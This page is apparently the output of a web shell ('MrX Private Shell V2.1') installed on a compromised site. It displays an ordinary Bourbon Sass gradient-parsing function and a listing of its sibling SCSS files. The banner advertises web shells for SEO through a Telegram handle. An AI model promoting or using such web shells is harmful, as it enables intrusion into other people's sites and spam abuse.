__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
@function _radial-arg-parser($g1, $g2, $pos, $shape-size) {
@if $output-bourbon-deprecation-warnings == true {
@warn "[Bourbon] [Deprecation] `_radial-arg-parser` is " +
"deprecated and will be removed in 5.0.0.";
}
@each $value in $g1, $g2 {
$first-val: nth($value, 1);
$pos-type: type-of($first-val);
$spec-at-index: null;
// Determine if spec was passed to mixin
@if type-of($value) == list {
$spec-at-index: if(index($value, at), index($value, at), false);
}
@if $spec-at-index {
@if $spec-at-index > 1 {
@for $i from 1 through ($spec-at-index - 1) {
$shape-size: $shape-size nth($value, $i);
}
@for $i from ($spec-at-index + 1) through length($value) {
$pos: $pos nth($value, $i);
}
}
@else if $spec-at-index == 1 {
@for $i from ($spec-at-index + 1) through length($value) {
$pos: $pos nth($value, $i);
}
}
$g1: null;
}
// If not spec calculate correct values
@else {
@if ($pos-type != color) or ($first-val != "transparent") {
@if ($pos-type == number)
or ($first-val == "center")
or ($first-val == "top")
or ($first-val == "right")
or ($first-val == "bottom")
or ($first-val == "left") {
$pos: $value;
@if $pos == $g1 {
$g1: null;
}
}
@else if
($first-val == "ellipse")
or ($first-val == "circle")
or ($first-val == "closest-side")
or ($first-val == "closest-corner")
or ($first-val == "farthest-side")
or ($first-val == "farthest-corner")
or ($first-val == "contain")
or ($first-val == "cover") {
$shape-size: $value;
@if $value == $g1 {
$g1: null;
}
@else if $value == $g2 {
$g2: null;
}
}
}
}
}
@return $g1, $g2, $pos, $shape-size;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| _convert-units.scss | File | 977 B | 0664 |
|
| _directional-values.scss | File | 3.05 KB | 0664 |
|
| _font-source-declaration.scss | File | 1.36 KB | 0664 |
|
| _gradient-positions-parser.scss | File | 875 B | 0664 |
|
| _linear-angle-parser.scss | File | 1.12 KB | 0664 |
|
| _linear-gradient-parser.scss | File | 1.45 KB | 0664 |
|
| _linear-positions-parser.scss | File | 2.49 KB | 0664 |
|
| _linear-side-corner-parser.scss | File | 1.28 KB | 0664 |
|
| _radial-arg-parser.scss | File | 1.95 KB | 0664 |
|
| _radial-gradient-parser.scss | File | 1.42 KB | 0664 |
|
| _radial-positions-parser.scss | File | 877 B | 0664 |
|
| _render-gradients.scss | File | 1013 B | 0664 |
|
| _shape-size-stripper.scss | File | 445 B | 0664 |
|
| _str-to-num.scss | File | 1.37 KB | 0664 |
|